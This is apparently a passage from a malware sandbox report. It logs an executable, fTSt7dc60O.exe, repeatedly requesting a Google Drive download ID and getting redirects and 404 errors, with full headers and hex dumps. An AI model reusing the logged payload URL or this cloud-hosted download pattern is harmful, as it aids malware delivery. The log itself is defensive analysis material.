                                                    Content-Security-Policy: script-src 'nonce-yjf1uN9aRir7r78SGxORyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.752147142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:25 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:25 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6dil4cMFJrtfkmnuuz09E-0PjXegF0f1dgqZfhFEa10L6SnhfFcq9XsEjVdY95bndjSU1gVhM
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:25 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-ejuoyyGMeroZSQIu0Rdrgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 34 48 57 2d 5f 2d 66 30 30 6c 41 56 65 6e 77 6f 50 50 30 56 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="84HW-_-f00lAVenwoPP0Vg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.752155172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:26 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:27 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:27 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-UInas9lethOfb0Pe_fC-Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.752164142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:27 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:28 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQyw8c0aB7IKG6fgmoi4mLTn6dLoR_190lO2KpaABfwgYJ2YVEvVovcC5Dwg-GikJMaFgwrIfc
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:28 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-Mabm5OnitgiM2uhjC9aruQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 75 69 33 70 4e 76 74 54 47 32 4e 7a 59 37 68 72 55 50 6e 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hui3pNvtTG2NzY7hrUPnCQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.752172172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:29 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:29 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:29 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-qZ0xFFcnRwNQBRZCzq0MYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.752180142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:30 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:30 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTbDWjoKmBbO6aCQISLuiQ7MrgbDoThX2g5OEXAH0mF79-45jnd-0eKfY0oa53So3zp
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:30 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-pkb7fki7ef9BTuVoMbMwvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 69 64 6a 77 43 4e 6d 58 4d 6d 52 5f 66 6f 63 34 54 53 49 74 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AidjwCNmXMmR_foc4TSItg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.752186172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:31 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:31 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:31 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-2WJilx22vwE-3I2mNehwWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.752192142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:32 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:32 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgT369MaVz7SBWW5aXPsFnbCZnmQdtHAOgoCTmGUNYQfg9o7bHeHXCgJ1M6nT8dQiAzh
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:32 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-4rdDBkOrW1OOWULK-x3XWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:32 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 31 78 68 66 73 63 6c 43 46 39 6f 4d 65 4f 6f 59 58 57 34 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="71xhfsclCF9oMeOoYXW43A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.752203172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:33 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
